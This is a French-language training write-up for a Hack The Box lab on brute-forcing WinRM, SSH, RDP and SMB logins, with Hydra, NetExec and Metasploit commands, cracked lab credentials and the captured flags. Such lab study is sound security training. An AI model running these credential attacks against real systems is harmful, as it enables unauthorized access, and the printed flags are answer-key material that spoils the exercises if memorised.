Network Services

Lors d’un test d’intrusion, chaque réseau rencontré comporte différents services réseau permettant de gérer, éditer ou créer du contenu. Ces services sont exécutés avec des permissions spécifiques et assignés à des utilisateurs donnés.

En dehors des applications web, on retrouve notamment : FTP, SMB, NFS, IMAP/POP3, SSH, MySQL/MSSQL, RDP, WinRM, VNC, Telnet, SMTP et LDAP.

👉 Pour aller plus loin sur l’énumération initiale de ces services, consulter le module Footprinting.

🔑 Accès distant aux systèmes

Pour administrer un serveur à distance (Windows ou Linux), il est nécessaire d’utiliser un service permettant d’exécuter des commandes ou d’accéder à un bureau graphique.

Windows : les plus utilisés sont RDP et WinRM.
Linux : le service principal est SSH.

Tous ces services reposent sur un mécanisme d’authentification (identifiant/mot de passe ou clé). Mal configurés, ils deviennent une surface d’attaque privilégiée.

🪟 WinRM (Windows Remote Management)

WinRM est l’implémentation Microsoft du protocole WS-Management, basé sur SOAP. Il sert à administrer des systèmes Windows à distance.

Ports par défaut : TCP 5985 (HTTP) et 5986 (HTTPS).
Nécessite une activation manuelle sur Windows 10/11.
Peut être sécurisé par certificats ou authentifications spécifiques.

🔧 Outils associés

NetExec

NetExec est un outil polyvalent permettant d’attaquer WinRM, mais aussi SMB, LDAP, MSSQL et d’autres services.

sudo apt-get -y install netexec
netexec winrm <IP_CIBLE> -u user.list -p password.list

Un résultat indiquant (Pwn3d!) signifie qu’une exécution de commande est probablement possible.

Evil-WinRM

Une fois les identifiants obtenus, Evil-WinRM permet d’ouvrir une session PowerShell distante :

sudo gem install evil-winrm
evil-winrm -i <IP_CIBLE> -u <username> -p <password>

🔒 SSH (Secure Shell)

SSH est le protocole standard de connexion sécurisée pour les systèmes Linux (port TCP 22).

📜 Fonctionnement cryptographique

Chiffrement symétrique : même clé pour chiffrer/déchiffrer (ex. AES).
Chiffrement asymétrique : paire clé publique / clé privée.
Hashing : vérification d’intégrité et d’authenticité.

🔧 Brute-force avec Hydra

hydra -L user.list -P password.list ssh://<IP_CIBLE>

Une fois le mot de passe trouvé :

ssh user@<IP_CIBLE>

🖥️ RDP (Remote Desktop Protocol)

RDP permet l’accès distant graphique à un système Windows via TCP 3389.

Utilisé pour la prise en main à distance par les administrateurs.
Supporte l’échange d’images, sons, clavier, souris, et même l’impression distante.

🔧 Hydra - Brute-force RDP

hydra -L user.list -P password.list rdp://<IP_CIBLE>

🔧 Client RDP sous Linux

Exemple avec xfreerdp :

xfreerdp /v:<IP_CIBLE> /u:<username> /p:<password>

📂 SMB (Server Message Block)

SMB est un protocole de partage de fichiers et d’imprimantes en réseau local, utilisé surtout dans les environnements Windows.

Port TCP 445.
Implémentation open-source : Samba (Linux/macOS).

🔧 Hydra - Brute-force SMB

hydra -L user.list -P password.list smb://<IP_CIBLE>

⚠️ Certaines versions de Hydra ne supportent pas SMBv3 → utiliser Metasploit ou mettre Hydra à jour.

msfconsole -q
use auxiliary/scanner/smb/smb_login
set user_file user.list
set pass_file password.list
set rhosts <IP_CIBLE>
run

🔧 NetExec - Enumération des partages SMB

netexec smb <IP_CIBLE> -u "user" -p "password" --shares

🔧 smbclient - Accès aux partages

smbclient -U user \\\\<IP_CIBLE>\\SHARENAME

📚 Ressources utiles

To complete the challenge questions, be sure to download the wordlists from the attached network-services.zip archive. It is highly recommended to run your attacks from the Pwnbox as some of the tasks take much longer over the VPN

Nous pouvons télécharger le fichier network-services.zip à l'aide de la commande suivante :

wget https://academy.hackthebox.com/storage/modules/147/network-services.zip

Une fois téléchargé, nous utilisons la commande unzip afin d'extraire le contenu de l'archive :

$ unzip network-services.zip 
Archive:  network-services.zip
  inflating: username.list           
  inflating: password.list

Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

Nous utilisons netexec afin de craquer le mot de passe associé au poste cible

$ netexec winrm 10.129.202.136 -u username.list -p password.list 
WINRM       10.129.202.136  5985   WINSRV           [*] Windows 10 / Server 2019 Build 17763 (name:WINSRV) (domain:WINSRV)
[...]
WINRM       10.129.202.136  5985   WINSRV           [-] WINSRV\archive:princess
WINRM       10.129.202.136  5985   WINSRV           [-] WINSRV\:princess
WINRM       10.129.202.136  5985   WINSRV           [+] WINSRV\john:november (Pwn3d!)

Nous pouvons observer la mention Pwn3d!, nous obtenons ainsi l'utilisateur john associé avec le mot de passe november.

Une fois le mot de passe craqué, nous pouvons utiliser evil-winrm :

$ evil-winrm -i 10.129.138.178 -ujohn -p november
                                        
Evil-WinRM shell v3.5                
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                    
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents>

Une fois la connexion effective, nous pouvons récupérer le contenu du fichier flag.txt présent que le poste cible :

*Evil-WinRM* PS C:\Users\john\Documents> ls ../Desktop
    Directory: C:\Users\john\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         1/5/2022   8:13 AM             18 flag.txt


*Evil-WinRM* PS C:\Users\john\Documents> cat ../Desktop/flag.txt
HTB{That5Novemb3r}

Nous obtenons ainsi le flag :

HTB{That5Novemb3r}

Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

En ce qui concerne l'attaque sur le protocole SSH, nous allons utiliser hydra :

$ hydra -L username.list -P password.list ssh://10.129.207.75
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-05 06:52:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task
[DATA] attacking ssh://10.129.207.75:22/
id
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 20936 to do in 01:59h, 16 active
[22][ssh] host: 10.129.207.75   login: dennis   password: rockstar

Le bruteforce nous remonte les identifiants suivants :

dennis:rockstar

Nous nous connectons alors à notre cible avec les identifiants trouvés avec hydra :

$ ssh dennis@10.129.207.75
dennis@10.129.207.75's password: 

Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

dennis@WINSRV C:\Users\dennis>

Maintenant connectés, nous récupérons le contenu du fichier flag.txt :

dennis@WINSRV C:\Users\dennis>dir Desktop 
 Volume in drive C has no label. 
 Volume Serial Number is 2683-3D37 

 Directory of C:\Users\dennis\Desktop

01/05/2022  09:16 AM    <DIR>          .
01/05/2022  09:16 AM    <DIR>          ..
01/05/2022  09:39 AM                15 flag.txt
               1 File(s)             15 bytes
               2 Dir(s)  25,218,711,552 bytes free

dennis@WINSRV C:\Users\dennis>cd Desktop 
dennis@WINSRV C:\Users\dennis\Desktop>type flag.txt 
HTB{Let5R0ck1t}

Nous récupérons ainsi le flag attendu :

HTB{Let5R0ck1t}

Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

Pour réaliser le bruteforce sur le protocole RDP, nous utilisons netexec :

$ netexec rdp 10.129.207.75 -u username.list -p password.list 
RDP         10.129.207.75   3389   WINSRV           [*] Windows 10 or Windows Server 2016 Build 17763 (name:WINSRV) (domain:WINSRV) (nla:True)
[...]
RDP         10.129.207.75   3389   WINSRV           [+] WINSRV\chris:789456123 (Pwn3d!)

Nous relevons ainsi les identifiants associés au protocole RDP de notre cible :

chris:789456123

Nous pouvons donc utiliser ces identifiants à l'aide de l'outil xfreerdp :

xfreerdp /v:10.129.207.75 /u:chris /p:789456123

Nous pouvons ainsi récupérer le contenu du fichier flag.txt :

HTB{R3m0t3DeskIsw4yT00easy}

Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

Nous allons utiliser Metasploit afin d'énumérer les différents utilisateurs possibles pour une connexion en SMB :

$ msfconsole

[msf](Jobs:0 Agents:0) >> search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login  .                normal  No     SMB Login Check Scanner

[msf](Jobs:0 Agents:0) >> use 0

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_login) >> set user_file username.list
user_file => username.list

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_login) >> set pass_file password.list
pass_file => password.list

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_login) >> set rhost 10.129.202.136
rhost => 10.129.202.136

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_login) >> run
[*] 10.129.202.136:445    - 10.129.202.136:445 - Starting SMB login bruteforce
[+] 10.129.202.136:445    - 10.129.202.136:445 - Success: '.\john:november'
[+] 10.129.202.136:445    - 10.129.202.136:445 - Success: '.\dennis:rockstar'
[+] 10.129.202.136:445    - 10.129.202.136:445 - Success: '.\chris:789456123'
[+] 10.129.202.136:445    - 10.129.202.136:445 - Success: '.\cassie:12345678910'

Une fois l'énumération effectuée, en s'aidant du cours proposé ci-dessus, nous pouvons remarquer un nouvel utilisateur encore non utilisé pour lequel les identifiants semblent fonctionnés :

cassie:12345678910

Nous effectuons donc une liste des dossiers partagés disponibles à l'aide de netexec :

$ netexec smb 10.129.202.136 -u cassie -p 12345678910 --shares
SMB         10.129.202.136  445    WINSRV           [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB         10.129.202.136  445    WINSRV           [+] WINSRV\cassie:12345678910
SMB         10.129.202.136  445    WINSRV           [*] Enumerated shares
SMB         10.129.202.136  445    WINSRV           Share           Permissions     Remark
SMB         10.129.202.136  445    WINSRV           -----           -----------     ------
SMB         10.129.202.136  445    WINSRV           ADMIN$                          Remote Admin
SMB         10.129.202.136  445    WINSRV           C$                              Default share
SMB         10.129.202.136  445    WINSRV           CASSIE          READ,WRITE  
SMB         10.129.202.136  445    WINSRV           IPC$            READ

Il nous est alors possible d'observer qu'un répertoire nommé CASSIE est disponible. Nous pouvons donc, à l'aide de smbclient, accéder au contenu de ce répertoire :

$ smbclient -U cassie \\\\10.129.202.136\\CASSIE
Password for [WORKGROUP\cassie]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Wed Sep 17 03:57:46 2025
  ..                                 DR        0  Wed Sep 17 03:57:46 2025
  desktop.ini                       AHS      282  Thu Jan  6 08:44:52 2022
  flag.txt                            A       16  Thu Jan  6 08:46:14 2022

		10328063 blocks of size 4096. 6419661 blocks available

Une fois connectés, nous pouvons observer la présence d'un fichier flag.txt. Nous pouvons donc le récupérer en local et vérifier son contenu afin de valider notre question actuelle :

smb: \> get flag.txt 
getting file \flag.txt of size 16 as flag.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> exit

┌─[eu-academy-3]─[htb-ac-@htb]─[~]
└──╼ [★]$ cat flag.txt 
HTB{S4ndM4ndB33}

Nous obtenons ainsi le flag attendu :

HTB{S4ndM4ndB33}

PreviousRemote Password Attacks NextSpraying, Stuffing, and Defaults

Last updated 4 months ago

hashtag🔑 Accès distant aux systèmes

hashtag🪟 WinRM (Windows Remote Management)

hashtag🔧 Outils associés

hashtag🔒 SSH (Secure Shell)

hashtag📜 Fonctionnement cryptographique

hashtag🔧 Brute-force avec Hydra

hashtag🖥️ RDP (Remote Desktop Protocol)

hashtag🔧 Hydra - Brute-force RDP

hashtag🔧 Client RDP sous Linux

hashtag📂 SMB (Server Message Block)

hashtag🔧 Hydra - Brute-force SMB

hashtag🔧 Metasploit - SMB Login

hashtag🔧 NetExec - Enumération des partages SMB

hashtag🔧 smbclient - Accès aux partages

hashtag📚 Ressources utiles